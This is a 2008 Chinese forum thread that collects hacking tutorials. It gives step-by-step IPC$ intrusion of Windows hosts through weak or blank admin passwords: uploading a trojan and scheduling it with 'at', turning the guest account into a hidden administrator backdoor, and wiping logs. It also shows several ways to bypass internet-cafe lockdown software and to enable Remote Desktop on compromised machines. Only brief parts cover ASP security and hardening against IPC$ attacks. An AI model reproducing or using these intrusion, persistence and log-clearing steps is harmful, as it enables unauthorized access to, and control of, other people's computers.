我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。


六 ipc$连接在hack攻击中的意义


就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,那你可就了不得了,基本上可以为所欲为了。不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些粗心的管理员存在弱口令,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码将会越来越难的,因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,甚至在主机不开启ipc$共享时,你根本就无法连接,你会慢慢的发现ipc$连接并不是万能的,所以不要奢望每次连接都能成功,那是不现实的。
是不是有些灰心?倒也不用,关键是我们要摆正心态,不要把ipc$入侵当作终极武器,不要认为它战无不胜,它只是很多入侵方法中的一种,你有可能利用它一击必杀,也有可能一无所获,这些都是正常的,在黑客的世界里,不是每条大路都能通往罗马,但总有一条路会通往罗马,耐心的寻找吧!
说明:ipc$详细解说大全(2)和ipc$详细解说大全(1)连在一起,要找ipc$详细解说大全(2)去上面的连接找去吧!(细细的找)
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 40 发表于: 2008-06-14 22:44:25
ipc$详细解说大全(2)

七 ipc$连接失败的常见原因

以下是一些常见的导致ipc$连接失败的原因:


1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;


2 如果想成功的建立一个ipc$连接,就需要对方开启ipc$共享,即使是空连接也是这样,如果对方关闭了ipc$共享,你将会建立失败;


3 你未启动Lanmanworkstation服务,它提供网络链结和通讯,没有它你无法发起连接请求(显示名为:Workstation);


4 对方未启动Lanmanserver服务,它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它远程主机将无法响应你的连接请求(显示名为:Server);


5 对方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份;


6 对方禁止了NBT(即未打开139端口);


7 对方防火墙屏蔽了139和445端口;


8 你的用户名或者密码错误(显然空会话排除这种错误);


9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;


10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。


另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。







八 复制文件失败的原因


有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?


1 盲目复制
这类错误出现的最多,占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下对方的共享情况,不要认为ipc$连接建立成功了就一定有共享文件夹。


2 默认共享判断错误
这类错误也是大家经常犯的,主要有两个小方面:

1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向admin$之类的默认共享复制文件,导致复制失败。ipc$ 连接成功只能说明对方打开了ipc$共享,ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默认共享并不是 ipc$共享的必要条件;

2)由于net view \\IP 无法显示默认共享(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的想跳楼作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)


3用户权限不够,包括四种情形:
1)空连接向所有共享(默认共享和普通共享)复制时,大多情况下权限是不够的;
2)向默认共享复制时,要具有管理员权限;
3)向普通共享复制时,要具有相应权限(即对方事先设定的访问权限);
4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;

还需要说明一点:不要认为administrator就一定是管理员,管理员名称是可以改的。


4被防火墙杀死或在局域网
也许你的复制想跳楼作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;还有可能你把木马复制到了局域网内的主机,导致连接失败。因此建议你复制时要小心,否则就前功尽弃了。


呵呵,大家也知道,ipc$连接在实际想跳楼作过程中会出现千奇百怪的问题,上面我所总结的只是一些常见错误,没说到的,只能让大家自己去体会了。


九 如何打开目标的IPC$共享以及其他共享


目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等,然后在shell下执行 net share ipc$来开放目标的ipc$,用net share ipc$ /del来关闭共享。如果你要给它开共享文件夹,你可以用net share baby=c:\,这样就把它的c盘开为共享名为baby共享了。


十 一些需要shell才能完成的命令


看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:

1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的想跳楼作需要在shell下完成;

2 打开远程主机的ipc$共享,默认共享,普通共享的想跳楼作需要在shell下完成;

3 运行/关闭远程主机的服务,需要在shell下完成;

4 启动/杀掉远程主机的进程,也需要在shell下完成。


十一 入侵中可能会用到的相关命令


请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。

1 建立空连接:
net use \\IP\ipc$ "" /user:""

2 建立非空连接:
net use \\IP\ipc$ "psw" /user:"account"

3 查看远程主机的共享资源(但看不到默认共享)
net view \\IP

4 查看本地主机的共享资源(可以看到本地的默认共享)
net share

5 得到远程主机的用户名列表
nbtstat -A IP

6 得到本地主机的用户列表
net user

7 查看远程主机的当前时间
net time \\IP

8 显示本地主机当前服务
net start

9 启动/关闭本地服务
net start 服务名 /y
net stop 服务名 /y

10 映射远程共享:
net use z: \\IP\baby
此命令将共享名为baby的共享资源映射到z盘

11 删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del /y删除全部

12 向远程主机复制文件
copy \路径\srv.exe \\IP\共享目录名,如:
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内

13 远程添加计划任务
at \\ip 时间 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径


14 开启远程主机的telnet
这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:

1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就该ntlm认证
4)对WIN2K/XP有效,NT未经测试
命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port
试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90

15 激活用户/加入管理员组
1 net uesr account /active:yes
2 net localgroup administrators account /add

16 关闭远程主机的telnet
同样需要一个小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""

17 删除一个已建立的ipc$连接
net use \\IP\ipc$ /del
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 41 发表于: 2008-06-14 22:44:41
ipc$详细解说大全(3)


十二 ipc$完整入侵步骤祥解

其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!

1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空


2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧


3上面开telnet的命令没忘吧,要用到opentelnet这个小程序
c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90
如果返回如下信息
*******************************************************
Remote Telnet Configure, by refdom
Email: refdom@263.net
OpenTelnet.exe

Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport
*******************************************************
Connecting \\192.168.21.*...Successfully!

NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

Starting telnet service...
telnet service is started successfully! telnet service is running!

BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*说明你已经打开了一个端口90的telnet。


4 现在我们telnet上去
telnet 192.168.21.* 90
如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了


5 C:\>net user guest /active:yes
*将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no


6 C:\>net user guest 1234
*将Guest的密码改为1234,或者改成你喜欢的密码


7 C:\>net localgroup administrators guest /add
*将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。


8 好了,现在我们来走另一条路,给它传个木马玩玩


9 首先,我们先建立起ipc$连接
C:\>net use \\192.168.21.*\ipc$ "" /user:administrator


10 既然要上传东西,就要先知道它开了什么共享
C:\>net view \\192.168.21.*
在 \\192.168.21.*的共享资源
资源共享名 类型 用途 注释

-----------------------------------------------------------
C Disk
D Disk
命令成功完成。
*好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。


11 C:\>copy love.exe \\192.168.21.*\c
已复制 1 个文件
*用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现


12 运行木马前,我们先看看它现在的时间
net time \\192.168.21.*
\\192.168.21.*的当前时间是 2003/8/22 上午 11:00
命令成功完成


13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了
C:\>at \\192.168.21.* 11:02 c:\love.exe
新加了一项作业,其作业 ID = 1
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 42 发表于: 2008-06-14 22:45:09
ipc$详细解说大全(4)
4 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了


嗯,好了,两种基本方法都讲了。如果你对上面的想跳楼作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命令:psexec \\tergetIP -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。
讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面


十三 如何防范ipc$入侵


1 禁止空连接进行枚举(此想跳楼作并不能阻止空连接的建立)

方法1:
运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:1
如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但限制通过这种连接得到列举SAM帐号和共享等信息;在Windows 2000 中增加了"2",限制所有匿名访问除非特别授权,如果设置为2的话,可能会有一些其他问题发生,建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。

方法2:
在本地安全设置-本地策略-安全选项-在'对匿名连接的额外限制'中做相应设置


2 禁止默认共享

1)察看本地共享资源
运行-cmd-输入net share

2)删除共享(重起后默认共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)

3)停止server服务
net stop server /y (重新启动后server服务会重新开启)

4)禁止自动打开默认共享(此想跳楼作并未关闭ipc$共享)
运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加。


3 关闭ipc$和默认共享依赖的服务:server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用
这时可能会有提示说:XXX服务也会关闭是否继续,因为还有些次要的服务要依赖于lanmanserver,不要管它。


4 屏蔽139,445端口
由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻止ipc$入侵。

1)139端口可以通过禁止NBT来屏蔽
本地连接-TCP/IT属性-高级-WINS-选‘禁用TCP/IT上的NETBIOS’一项

2)445端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
value: 0
修改完后重启机器

注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。


3)安装防火墙进行端口过滤


5 设置复杂密码,防止通过ipc$穷举出密码。


十四 ipc$入侵问答精选


上面说了一大堆的理论东西,但在实际中你会遇到各种各样的问题,因此为了给予大家最大的帮助,我看好几个安全论坛,找了n多的帖子,从中整理了一些有代表性的问答,其中的一些答案是我给出的,一些是论坛上的回复,如果有什么疏漏和错误,还请包涵。


1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?

答:留下记录是一定的,你走后用程序删除就可以了,或者用肉鸡入侵。


2.你看下面的情况是为什么,可以连接但不能复制
net use \\***.***.***.***\ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe \\***.***.***.***\admin$
找不到网络路径
命令不成功

答:可能有两个原因:
1)你的权限不够,不能访问默认共享;

2)对方没有开启admin$默认共享,不要认为能进行ipc$连接,对方就一定开了默认共享(很多人都这么以为,误区!!),此时你可以试试别的默认共享或普通共享,比如c$,d$,c,d等,如果还是不行,就要看你的权限了,如果是管理员权限,你可以开telnet,如果能成功,在给它开共享也行。


3.如果对方开了IPC$,且能建立空联接,但打开C、D盘时,都要求密码,我知道是空连接没有太多的权限,但没别的办法了吗?

答:建议先用流光或者别的什么猜解一下密码,如果猜不出来,只能放弃,毕竟空连接的能力有限。


4.我已经猜解到了管理员的密码,且已经ipc$连接成功了,但net view \\ip发现它没开默认共享,我该怎么办?

答:首先纠正你的一个错误,用net view是无法看到默认共享的。既然你现在有管理员权限,而且对方又开了ipc$,建议你用opentelnet.exe这个小程序打开它的telent,在获得了这个shell之后,做什么都可以了。


5.ipc$连接成功后,我用下面的命令建立了一个帐户,却发现这个帐户在我自己的机器上,这是怎么回事?
net uset ccbirds /add

答:ipc$建立成功只能说明你与远程主机建立了通信隧道,并不意味你取得了一个shell,只有在获得一个shell之后,你才能在远程建立一个帐户,否则你的想跳楼作只是在本地进行。


6.我已进入了一台肉机,用的管理员帐号,可以看他的系统时间,但是复制程序到他的机子上却不行,每次都提示“拒绝访问,已复制0个文件”,是不是对方有什么服务没开,我该怎么办?

答:不能copy文件有多个可能,除了权限不够外,还可能是对方c$,d$等默认管理共享没开,或者是对方为NTFS文件格式,通过设置,管理员也未必能远程写文件。既然你有管理员权限,那就开telnet上去吧,然后在开它的共享。







7.我用Win98能与对方建立ipc$连接吗?

答:不可以的,要进行ipc$的想跳楼作,建议用win2000


8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话,但用nbtstat -A IP 却无法导出用户列表,这是为什么?

答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁止导出列表,就会出现你所说的情况;或者你自己的NBT没有打开,netstat是建立在NBT之上的。  


9.我建立ipc$连接的时候返回如下信息:‘提供的凭据与已存在的凭据集冲突’,怎么回事?

答:呵呵,这说明你与目标主机建立了一个以上的ipc$连接,这是不允许的,把其他的删掉吧:net use \\*.*.*.*\ipc$ /del


10.我在映射的时候出现:
F:\>net use h: \\211.161.134.*\e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事?

答:你也太粗心了吧,这说明你的h盘正在使用,映射到别的盘符吧!


11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"ccbirds" 成功了,但当我映射时出现了错误,向我要密码,怎么回事?
F:\>net use h: \\*.*.*.*\c$
密码在 \\*.*.*.*\c$ 无效。
请键入 \\*.*.*.*\c$ 的密码:
系统发生 5 错误。
拒绝访问。

答:呵呵,向你要密码说明你当前使用的用户权限不够,不能映射C$这个默认共享,想办法提升权限或者找管理员的弱口令吧!默认共享一般是需要管理员权限的。


12.我用superscan扫到了一个开了139端口的主机,但为什么不能空连接呢?

答:你混淆了ipc$与139的关系,能进行ipc$连接的主机一定开了139或445端口,但开这两个端口的主机可不一定能空连接,因为对方可以关闭ipc$共享.


13.我门局域网里的机器大多都是xp,我用流光扫描到几个administrator帐号口令是空,而且可以连接,但不能复制东西,说错误5。请问为什么?

答:xp的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录进行身份验证的时候,默认为来宾权限,即使你用管理员远程登录,也只具有来宾权限,因此你复制文件,当然是错误5:权限不够。


14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功,可是 net use i: \\192.168.0.2\c
出现请键入 \\192.168.0.2 的密码,怎么回事情呢?

答:虽然你具有管理员权限,但管理员在设置c盘共享权限时可能并未设置允许administrator访问,所以会出现问题。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 43 发表于: 2008-06-14 22:45:32
常见ASP脚本攻击及防范技巧

由于ASP的方便易用,越来越多的网站后台程序都使用ASP脚本语言。但是,由于ASP本身存在一些安全漏洞,稍不小心就会给黑客提供可乘之机。事实上,安全不仅是网管的事,编程人员也必须在某些安全细节上注意,养成良好的安全习惯,否则会给自己的网站带来巨大的安全隐患。目前,大多数网站上的ASP程序有这样那样的安全漏洞,但如果编写程序的时候注意一点的话,还是可以避免的。

  1、用户名与口令被破解

  攻击原理:用户名与口令,往往是黑客们最感兴趣的东西,如果被通过某种方式看到源代码,后果是严重的。

  防范技巧:涉及用户名与口令的程序最好封装在服务器端,尽量少在ASP文件里出现,涉及与数据库连接的用户名与口令应给予最小的权限。出现次数多的用户名与口令可以写在一个位置比较隐蔽的包含文件中。如果涉及与数据库连接,在理想状态下只给它以执行存储过程的权限,千万不要直接给予该用户修改、插入、删除记录的权限。

  2、验证被绕过

  攻击原理:现在需要经过验证的ASP程序大多是在页面头部加一个判断语句,但这还不够,有可能被黑客绕过验证直接进入。

  防范技巧:需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。
3、inc文件泄露问题

  攻击原理:当存在ASP的主页正在制作且没有进行最后调试完成以前,可以被某些搜索引擎机动追加为搜索对象。如果这时候有人利用搜索引擎对这些网页进行查找,会得到有关文件的定位,并能在浏览器中查看到数据库地点和结构的细节,并以此揭示完整的源代码。

  防范技巧:程序员应该在网页发布前对它进行彻底的调试;安全专家则需要加固ASP文件以便外部的用户不能看到它们。首先对.inc文件内容进行加密,其次也可以使用.asp文件代替.inc文件使用户无法从浏览器直接观看文件的源代码。inc文件的文件名不要使用系统默认的或者有特殊含义容易被用户猜测到的名称,尽量使用无规则的英文字母。

  4、自动备份被下载

  攻击原理:在有些编辑ASP程序的工具中,当创建或者修改一个ASP文件时,编辑器自动创建一个备份文件,比如:UltraEdit就会备份一个. bak文件,如你创建或者修改了some.asp,编辑器会自动生成一个叫some.asp.bak文件,如果你没有删除这个bak文件,攻击者可以直接下载some.asp.bak文件,这样some.asp的源程序就会被下载。

  防范技巧:上传程序之前要仔细检查,删除不必要的文档。对以BAK为后缀的文件要特别小心。

  5、特殊字符

  攻击原理:输入框是黑客利用的一个目标,他们可以通过输入脚本语言等对用户客户端造成损坏;如果该输入框涉及数据查询,他们会利用特殊查询语句,得到更多的数据库数据,甚至表的全部。因此必须对输入框进行过滤。但如果为了提高效率仅在客户端进行输入合法性检查,仍有可能被绕过。

  防范技巧:在处理类似留言板、BBS等输入框的ASP程序中,最好屏蔽掉HTML、javascript、VBscript语句,如无特殊要求,可以限定只允许输入字母与数字,屏蔽掉特殊字符。同时对输入字符的长度进行限制。而且不但要在客户端进行输入合法性检查,同时要在服务器端程序中进行类似检查 6、数据库下载漏洞

  攻击原理:在用Access做后台数据库时,如果有人通过各种方法知道或者猜到了服务器的Access数据库的路径和数据库名称,那么他也能够下载这个Access数据库文件,这是非常危险的。

  防范技巧:

  (1)为你的数据库文件名称起个复杂的非常规的名字,并把它放在几层目录下。所谓 “非常规”,打个比方说,比如有个数据库要保存的是有关书籍的信息,可不要给它起个“book.mdb”的名字,而要起个怪怪的名称,比如d34ksfslf.mdb,并把它放在如./kdslf/i44/studi/的几层目录下,这样黑客要想通过猜的方式得到你的Access数据库文件就难上加难了。

  (2)不要把数据库名写在程序中。有些人喜欢把DSN写在程序中,比如:

  DBPath = Server.MapPath(“cmddb.mdb”)

  conn.Open “driver={Microsoft Access Driver (*.mdb)};dbq=” & DBPath

  假如万一给人拿到了源程序,你的Access数据库的名字就一览无余了。因此建议你在ODBC里设置数据源,再在程序中这样写:

  conn.open“shujiyuan”

  (3)使用Access来为数据库文件编码及加密。首先在“工具→安全→加密/解密数据库”中选取数据库(如:employer.mdb),然后按确定,接着会出现“数据库加密后另存为”的窗口,可存为:“employer1.mdb”。

  要注意的是,以上的动作并不是对数据库设置密码,而只是对数据库文件加以编码,目的是为了防止他人使用别的工具来查看数据库文件的内容。

  接下来我们为数据库加密,首先打开经过编码了的 employer1.mdb,在打开时,选择“独占”方式。然后选取功能表的“工具→安全→设置数据库密码”,接着输入密码即可。这样即使他人得到了 employer1.mdb文件,没有密码他也是无法看到 employer1.mdb中的内容

破解的关键在于如何能访问硬盘,因为你要执行的文件或寻找万象幻境的密码都离不开硬盘。那么如何进入硬盘呢?往下看,共为你准备了10种方法:


1.利用输入法漏洞


输入法漏洞不是中文Win2000的漏洞吗?没错!不过万象幻境也有这个漏洞!方法很简单:按ctrl+shift打开[M$]拼音输入法(如没有用其它输入法也可,方法类似),然后将光标插入会员卡号的文本输入框内,接着开始往里面输入任意一个拼音字母,然后就会出现拼音的状态条,在状态条上点击右键,或用键盘上的属性键,就会出现一个下拉菜单,选择其中的定义词组(放心,就算系统限制右键,在这也不管用)然后选择文件菜单里面的保存,就会调出保存对话框,然后随便选择一个文件夹,点击右键,选择资源管理器,打开,一切就OK啦!如果鼠标被限定在那个锁定窗口内,就用键盘想跳楼作。


2.利用QQ


网吧别的软件可以没有,但QQ绝对会有,否则就不会有那么多人去网吧了。打开QQ,随便选择一个好友,点传送文件,就会出现一个小窗口,让你选择文件,呵呵,秘密就在这里,先找到C盘下的注册表编辑器Regedit.exe,先用鼠标选中该文件,松开鼠标,用鼠标右键点击该文件,这时千万不要松开右键,点鼠标左键,就会出来右键菜单,里面什么都有,删除,打开,复制,呵呵,和不在美萍的限制下一样的,这下你想干什么就可以干什么了。


3.利用Foxmail或Outlook Express


以Foxmail为例来讲讲,Outlook Express类同。点“邮件”->“写新邮件”,在出现的“写邮件”窗口中点击“邮件”菜单下的“增加附件”,就会调出“打开”对话框,可以看到驱动器列表和目录列表了,想怎么样自己看着办吧!


4.利用TE


TE是QQ附带的浏览器,启动它,在地址栏直接输入C:回车,看看出现什么了?哈哈,C盘尽在眼前。但到了C盘有什么用呢,如果网管做了手脚,你还是不能执行文件。但是当我们用鼠标右键点上你要执行的文件(注意,是鼠标的右键),此时没有任何反映。此时不要松开鼠标右键,再按下鼠标左键,哈哈,看到鼠标正常的右键菜单了吧。这时点击"打开"选项,文件就被打开了。


5.用看图软件Acdsee


如果网吧中有这个软件,利用它的浏览功能,可以轻松的找到任何一个文件!呵呵,它的浏览功能帮过我不少忙,其实只要是有驱动器列表和目录列表控件的软件几乎都可以被利用,因为那是Windows的标准控件,一般是很难屏蔽的。


6.升级网吧管理专家


你可以“好心”的帮网吧管理者把网吧管理专家升级一下,那就什么密码也没有了,想干什么都可以了。不过,被发现了暴扁一顿可别来找我。


7.利用IE


先打开IE,再打开“收藏”菜单,用鼠标将“链接”拖入IE地址栏下面的空白区,然后点击“向上”、“向上”、再“向上”,看到了什么?对了,是C盘根目录!此时已经可以按方法5中所说方法为所欲为了。


8.Win98登入过程


在进入Win98登入过程中,网吧管理专家把鼠标锁定在右边的时候,左键单击屏幕,然后按F1键(多按几次)在彻底出现登入窗口的时候,如果成功的话会出现“Windows帮助”窗口,在“选项”下拉菜单中选择“按Web 帮助”,在“Web 帮助”窗口中点击“联机支持”的链接,这时弹出一个Internet Explorer浏览器了。只要在地址栏中输入要访问的站点(如在地址栏里输入http://www.sina.com.cn)或盘符(如c盘 c:\ ),如果网吧管理专家对硬盘进行保护使我们没法访问某个盘符时,可以用按“F3”键(windows默认的查找热键)弹出一个查找窗口后,输入你想打开的文件或文件夹进行查找,找到后即可打开。


9.桌面快捷方式


对桌面上的快捷方式点击右键,在弹出的菜单中选择“属性”->“更改图标”->“浏览”,可以打开文件浏览窗口,看是不是C盘出来了,然后点击向上到C盘windows文件夹找到系统工具的系统配置实用程序将自启动程序去掉,重启机器这样就可以啦!


10.Ctrl+Alt+Del


上面说的方法太麻烦了,这个简单。在看到窗口的画面时就按Ctrl+Alt+Del,大家会看到一个client项。结束它,但这时候还不行。过一会儿还会启动一次,再按Ctrl+Alt+Del结束它(这个步骤很不好使,要试好多次才能掌握),太快不行,太慢也不行,试多了就行了,最后你就会百试百灵。有的网吧管理专家下了补丁,会运行多一次,你再多结束一次任务就行了。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 44 发表于: 2008-06-14 22:45:52
开启3389的5种方法(上)

一:使用的工具:
1:ipcscan扫描器
2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IPort )
3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品)
4:cscript (在system32文件夹下;98想跳楼作系统可能没有
二:步骤:
1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发)

2:用rots.vbs开启终端服务

说明 cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]

格式 cscript.exe rots.vbs ip user userpass port /r
或者 cscript.exe rots.vbs ip user userpass port /fr


三:常见问题:

1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了.

2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧.

3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.
 

 

==========================================================================================
第二种方法:
==========================================================================================
进入后:TELNET上去!

c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
或者!
c:\>echo [Components] > d:\wawa
c:\>echo TSEnable = on >> d:\wawa
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\wawa /q
等会自动启后就OK


或者:
在本地利用DOS命令edit建立.bat后缀批处理文件(文件名随意) echo [Components] > c:\sql

echo TSEnable = on >>

c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

net use \\ip地址\ipc$ 密码 /user:用户名(一般默认:administrator)

利用at time 获取对方服务器时间。

copy 路径:\xxx.bat \\ip地址\$c:\winnt

at time 00:00:00 xxx.bat

服务器执行命令后,服务器将重新启动,利用3389登陆就OK了!
 

 

==========================================================================================

第三种方法:
==========================================================================================
进入后,先检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
//这是建立无人参与的安装参数
c:\>type c:\rock
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
-----------------------------------------------------

这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.

问题和建议:

A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.

B 一次不行可以再试一次,在实际中很有作用.

